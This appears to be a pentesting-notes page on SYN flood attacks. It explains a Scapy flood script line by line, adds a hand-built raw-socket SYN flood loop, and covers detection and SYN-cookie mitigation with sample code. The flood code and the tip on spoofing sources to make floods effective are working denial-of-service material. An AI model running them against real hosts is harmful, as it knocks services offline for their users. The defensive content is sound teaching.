A SYN flood attack exploits the TCP three-way handshake by sending a stream of SYN segments to a target. For each SYN the target allocates a half-open connection entry, answers with SYN-ACK, and waits for a final ACK that the attacker never sends, so the entries accumulate and consume resources.

  • Understanding the Script (the Scapy lines below assume `from scapy.all import *` and need raw-socket privileges, i.e. root, to send):
    • `ip = IP(dst="192.168.50.2")`: Sets the destination IP address to 192.168.50.2. The keyword is required: Scapy's first positional argument is raw packet bytes, so `IP("192.168.50.2")` would not set the destination.
    • `tcp = TCP(sport=RandShort(), dport=80, flags="S")`: Creates a TCP header with a random source port, destination port 80, and only the SYN flag set.
    • `raw = Raw(b"X"*1024)`: Adds 1024 bytes of payload (Scapy's class is `Raw`, not `RAW`). A normal SYN carries no data; the padding only adds bandwidth per packet, since the SYN itself is what fills the backlog.
    • `p = ip/tcp/raw`: Stacks the IP, TCP, and Raw layers into a single packet.
    • `send(p, loop=1, verbose=0)`: Sends the packet at layer 3 repeatedly until interrupted (`loop=1` means "keep looping", not "once") without per-packet output. Because the source address is the sender's own, the sender's kernel answers each returning SYN-ACK with a RST, which lets the target discard that half-open entry; floods that are meant to bite spoof the source or drop outbound RSTs.
  • Purpose of SYN Flood:
    • Resource Exhaustion: Each SYN occupies a slot in the listening socket's SYN backlog (the half-open connection queue) until it times out; once the backlog is full the kernel drops new SYNs, so legitimate clients cannot connect.
    • Denial of Service: The listener becomes unreachable even though the host and its bandwidth may otherwise be healthy, which is what makes a SYN flood a denial of service.
  • Detection and Mitigation:
    • Rate Limiting: Cap the rate of SYN segments accepted per source address and per listening port so that one sender cannot exhaust the backlog.
    • SYN Cookies: Encode the connection state in the initial sequence number of the SYN-ACK instead of allocating a backlog entry; the entry is created only when an ACK carrying a valid cookie comes back (on Linux, `net.ipv4.tcp_syncookies`, alongside `net.ipv4.tcp_max_syn_backlog`).
    • Firewalls and IDS: A stateful firewall can limit SYNs or half-open connections per source (for example iptables `-p tcp --syn` with the `limit` or `hashlimit` match), and an IDS can alert on SYN rates and SYN-to-ACK ratios that a normal client population does not produce.
  • References from Pentesting Literature:
    • SYN flood attacks are a classic example of a denial-of-service attack and are commonly discussed in penetration testing guides and HTB write-ups as an introduction to network-based attacks. #attacks attack dos
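Added example for the "Understanding the Script" section (this is not the page's script): the bytes that the Scapy stack `IP(dst=...)/TCP(sport=RandShort(), dport=80, flags="S")/Raw(b"X"*1024)` puts on the wire, built by hand so the layering, the SYN flag and both checksums can be inspected without Scapy or root. The source address 192.168.50.1, IP id 1, TTL 64, window 8192 and ISN 0 are this example's assumptions, not values from the page; only the destination 192.168.50.2, port 80 and the 1024-byte padding come from the page.

```python
# Added example, not the original page's script: hand-built IP/TCP(SYN)/Raw packet
# equivalent to the Scapy stack described above. Source address, IP id, TTL, window
# and ISN below are assumptions for the demo.
import random
import socket
import struct

SYN_FLAG = 0x02
DST_IP = "192.168.50.2"   # from the page
SRC_IP = "192.168.50.1"   # assumed attacker address


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by both the IPv4 and TCP checksum fields."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def rand_short() -> int:
    """Stand-in for Scapy's RandShort(), restricted to usable ephemeral ports."""
    return random.randint(1024, 65535)


def build_syn(src_ip, dst_ip, sport, dport=80, payload=b"X" * 1024,
              seq=0, ttl=64, ip_id=1) -> bytes:
    """Raw bytes of IP/TCP(SYN)/payload, the ip/tcp/raw stack from the script."""
    tcp_len = 20 + len(payload)
    # TCP header: data offset 5 words, flags=SYN only, checksum placeholder 0
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, SYN_FLAG, 8192, 0, 0)
    # TCP checksum covers a pseudo-header (addresses, protocol, TCP length) + header + data
    pseudo = struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                         0, socket.IPPROTO_TCP, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    # IPv4 header: version 4 / IHL 5, total length = 20 + TCP length, no fragmentation
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, ip_id, 0, ttl,
                     socket.IPPROTO_TCP, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_syn(pkt: bytes) -> dict:
    """Decode the fields a capture tool would show, and re-verify both checksums."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    pseudo = struct.pack("!4s4sBBH", pkt[12:16], pkt[16:20], 0, pkt[9], len(tcp))
    return {
        "src": socket.inet_ntoa(pkt[12:16]),
        "dst": socket.inet_ntoa(pkt[16:20]),
        "sport": sport,
        "dport": dport,
        "flags": tcp[13],
        "payload_len": len(tcp) - data_offset,
        "ip_checksum_ok": checksum(pkt[:ihl]) == 0,     # a correct header sums to zero
        "tcp_checksum_ok": checksum(pseudo + tcp) == 0,
    }


def send_loop(dst_ip=DST_IP, src_ip=SRC_IP, count=None) -> int:
    """What send(p, loop=1) does: push packets out a raw socket until Ctrl-C (or `count`).
    Needs root/CAP_NET_RAW; Linux sets IP_HDRINCL implicitly for IPPROTO_RAW sockets."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    sent = 0
    try:
        while count is None or sent < count:
            sock.sendto(build_syn(src_ip, dst_ip, rand_short()), (dst_ip, 0))
            sent += 1
    except KeyboardInterrupt:
        pass
    finally:
        sock.close()
    return sent


if __name__ == "__main__":
    # Inspect one packet instead of flooding; call send_loop() on a lab target only.
    print(parse_syn(build_syn(SRC_IP, DST_IP, rand_short())))
```

`parse_syn` is the check to run before pointing this at anything: a packet whose IP or TCP checksum does not verify is silently dropped by the target's stack, so it never reaches the backlog and the "flood" does nothing.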
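Added example for the "Detection and Mitigation" section (not code from the page): a small detector that tracks, per listener, the SYN rate over a sliding window and the number of handshakes never completed by an ACK, run over constructed traffic records, plus a stateless SYN-cookie check that shows why a listener using cookies allocates nothing until a valid ACK comes back. The record format, the thresholds, the window, the secret key and the traffic itself are assumptions made for the demo, and the cookie layout is simplified (Linux also packs an MSS index into the cookie).

```python
# Added example (not from the original page): SYN-flood detection over constructed
# records and a simplified SYN-cookie validator. Thresholds, window, secret key,
# record format and sample traffic are assumptions for the demo.
import hashlib
import hmac
from collections import defaultdict, deque

SYN, ACK = 0x02, 0x10          # TCP flag bits
TARGET = "192.168.50.2"        # the page's target


def half_open_monitor(records, window=1.0, syn_rate_limit=50, half_open_limit=20):
    """records: (timestamp, src_ip, dst_ip, dport, flags). Per listener, track SYNs in a
    sliding window and handshakes never completed by an ACK; flag when either limit is hit."""
    recent = defaultdict(deque)      # listener -> SYN timestamps inside the window
    half_open = defaultdict(set)     # listener -> sources that sent SYN but no ACK yet
    stats = defaultdict(lambda: {"peak_syn_rate": 0, "peak_half_open": 0, "flood": False})
    for ts, src, dst, dport, flags in sorted(records, key=lambda r: r[0]):
        key, st = (dst, dport), stats[(dst, dport)]
        if flags & SYN and not flags & ACK:
            half_open[key].add(src)
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            st["peak_syn_rate"] = max(st["peak_syn_rate"], len(q))
            st["peak_half_open"] = max(st["peak_half_open"], len(half_open[key]))
            if len(q) > syn_rate_limit or len(half_open[key]) > half_open_limit:
                st["flood"] = True
        elif flags & ACK and not flags & SYN:
            half_open[key].discard(src)  # third handshake step: entry is no longer half-open
    return dict(stats)


def legit_records():
    """Constructed: five clients each completing a handshake to port 80."""
    recs = []
    for i in range(5):
        t, src = 1.0 + 0.2 * i, f"192.168.50.{10 + i}"
        recs += [(t, src, TARGET, 80, SYN), (t + 0.01, src, TARGET, 80, ACK)]
    return recs


def flood_records():
    """Constructed: 200 SYNs from spoofed sources within 0.5 s, none ever followed by an ACK."""
    return [(5.0 + 0.0025 * i, f"10.0.{i}.1", TARGET, 80, SYN) for i in range(200)]


def syn_cookie(secret: bytes, src, dst, sport, dport, counter: int) -> int:
    """Server ISN for the SYN-ACK: 8-bit time counter || 24-bit truncated HMAC of the 4-tuple.
    Simplified layout; Linux additionally packs an MSS index into the cookie."""
    msg = f"{src}:{dst}:{sport}:{dport}:{counter & 0xFF}".encode()
    tag = hmac.new(secret, msg, hashlib.sha256).digest()
    return ((counter & 0xFF) << 24) | int.from_bytes(tag[:3], "big")


def check_cookie(secret, src, dst, sport, dport, ack_num, now_counter, max_age=2) -> bool:
    """Validate the client's final ACK (ack = ISN + 1) with no stored state: recompute the
    cookie for the 4-tuple and the counter found in the ACK, compare in constant time."""
    isn = (ack_num - 1) & 0xFFFFFFFF
    counter = isn >> 24
    if (now_counter - counter) & 0xFF > max_age:
        return False                      # too old: the cookie has expired
    expected = syn_cookie(secret, src, dst, sport, dport, counter)
    return hmac.compare_digest(expected.to_bytes(4, "big"), isn.to_bytes(4, "big"))


if __name__ == "__main__":
    print(half_open_monitor(legit_records() + flood_records()))
    key = b"per-boot-random-secret"
    isn = syn_cookie(key, "10.0.7.1", TARGET, 40000, 80, counter=7)
    print(check_cookie(key, "10.0.7.1", TARGET, 40000, 80, (isn + 1) & 0xFFFFFFFF, 8))
```

The detector keys half-open state by source address only, which is enough to separate a flood from a client population that completes its handshakes; a production version would key on the full 4-tuple and expire entries on RST or timeout. The cookie check is what lets a listener under flood keep accepting SYNs: a spoofed source never sends the ACK, so nothing is ever allocated for it.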